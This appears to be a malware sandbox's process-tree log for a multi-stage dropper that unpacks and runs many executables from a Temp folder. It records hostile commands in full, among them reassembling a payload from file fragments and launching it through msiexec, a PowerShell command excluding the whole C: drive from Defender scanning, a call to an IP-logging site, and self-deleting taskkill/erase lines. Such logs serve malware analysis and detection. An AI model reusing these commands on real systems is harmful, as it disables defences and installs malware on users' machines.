C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R ecHo | sEt /P = "MZ" > ~dWBNpV.F &Copy /b /y ~dWbNpV.F +YsLNPQ.k + 9Jd86KPL.RS + 6VTZU.XA8+CQ3X0._+ 3hAXC.X ..\2GBhNGG.N &sTaRt msiexec.exe /y ..\2GbhNGG.n & DEl /Q *10⤵PID:608
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>~dWBNpV.F"11⤵PID:976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "11⤵PID:2068
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /y ..\2GbhNGG.n11⤵PID:1416
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /iM "Tue09a30919dc5f00.exe"8⤵
- Kills process with taskkill
PID:3060
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c1731fe55c7.exe4⤵
- Loads dropped DLL
PID:1860 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09c1731fe55c7.exeTue09c1731fe55c7.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1492 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09c1731fe55c7.exeC:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09c1731fe55c7.exe6⤵PID:2952
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09786995c7f02a923.exe4⤵
- Loads dropped DLL
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09786995c7f02a923.exeTue09786995c7f02a923.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:940 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\4873913913.exe"6⤵PID:1928
-
C:\Users\Admin\AppData\Local\Temp\4873913913.exe"C:\Users\Admin\AppData\Local\Temp\4873913913.exe"7⤵PID:2728
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 5608⤵
- Program crash
PID:3188
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 940 -s 9326⤵
- Program crash
PID:2404
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0947ef38552fc.exe4⤵
- Loads dropped DLL
PID:628 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0947ef38552fc.exeTue0947ef38552fc.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:944 -
C:\Users\Public\run.exeC:\Users\Public\run.exe6⤵PID:2144
-
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe6⤵PID:1712
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/18tji77⤵PID:2708
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2708 CREDAT:275457 /prefetch:28⤵PID:2412
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09792fda06e.exe4⤵
- Loads dropped DLL
PID:1156 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09792fda06e.exeTue09792fda06e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1152
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue091e2054cef7.exe4⤵
- Loads dropped DLL
PID:1336 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue091e2054cef7.exeTue091e2054cef7.exe5⤵
- Executes dropped EXE
PID:2092 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Dzpafigaxd.vbs"6⤵PID:3260
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google\Qekdqa.exe'7⤵PID:3608
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dzpafigaxd.vbs"6⤵PID:3312
-
C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"7⤵PID:3768
-
-
-
C:\Users\Admin\AppData\Local\Temp\MSBuild.exeC:\Users\Admin\AppData\Local\Temp\MSBuild.exe6⤵PID:3796
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09264824c4.exe4⤵
- Loads dropped DLL
PID:1864 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09264824c4.exeTue09264824c4.exe5⤵
- Executes dropped EXE
PID:1848 -
C:\Users\Admin\Pictures\Adobe Films\auEmnFP18WgstEst_dfekoCj.exe"C:\Users\Admin\Pictures\Adobe Films\auEmnFP18WgstEst_dfekoCj.exe"6⤵PID:2568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 14606⤵
- Program crash
PID:3092
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0990c8b597f.exe4⤵
- Loads dropped DLL
PID:1140 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0990c8b597f.exeTue0990c8b597f.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2064 -
C:\Users\Admin\AppData\Local\Temp\is-GJRF9.tmp\Tue0990c8b597f.tmp"C:\Users\Admin\AppData\Local\Temp\is-GJRF9.tmp\Tue0990c8b597f.tmp" /SL5="$101A2,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0990c8b597f.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2228 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0990c8b597f.exe"C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0990c8b597f.exe" /SILENT7⤵
- Executes dropped EXE
PID:2336 -
C:\Users\Admin\AppData\Local\Temp\is-Q4324.tmp\Tue0990c8b597f.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q4324.tmp\Tue0990c8b597f.tmp" /SL5="$201A2,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0990c8b597f.exe" /SILENT8⤵
- Executes dropped EXE
PID:2396 -
C:\Users\Admin\AppData\Local\Temp\is-EC4ND.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-EC4ND.tmp\postback.exe" ss19⤵PID:3028
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0956c36b51.exe /mixone4⤵
- Loads dropped DLL
PID:1448 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0956c36b51.exeTue0956c36b51.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:880 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue0956c36b51.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0956c36b51.exe" & exit6⤵PID:1348
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue093cbcf0222440.exe4⤵PID:1872
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue093cbcf0222440.exeTue093cbcf0222440.exe5⤵PID:1576
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue093cbcf0222440.exe"C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue093cbcf0222440.exe" -u6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2164
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0971aafeebb6f.exe4⤵
- Loads dropped DLL
PID:1832 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0971aafeebb6f.exeTue0971aafeebb6f.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2124
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue0956c36b51.exe" /f1⤵
- Kills process with taskkill
PID:1428
-
C:\Windows\system32\taskeng.exetaskeng.exe {5C002774-4A5E-4C47-8192-614E93954CD8} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1884
-
C:\Users\Admin\AppData\Local\Temp\EEF1.exeC:\Users\Admin\AppData\Local\Temp\EEF1.exe1⤵PID:3560
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵PID:2352
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {24B7986D-A5E2-4B8B-BB2C-BE2E45E0D506} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3776
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵PID:3540
-
-
C:\Users\Admin\AppData\Roaming\vwcgcaaC:\Users\Admin\AppData\Roaming\vwcgcaa2⤵PID:1916
-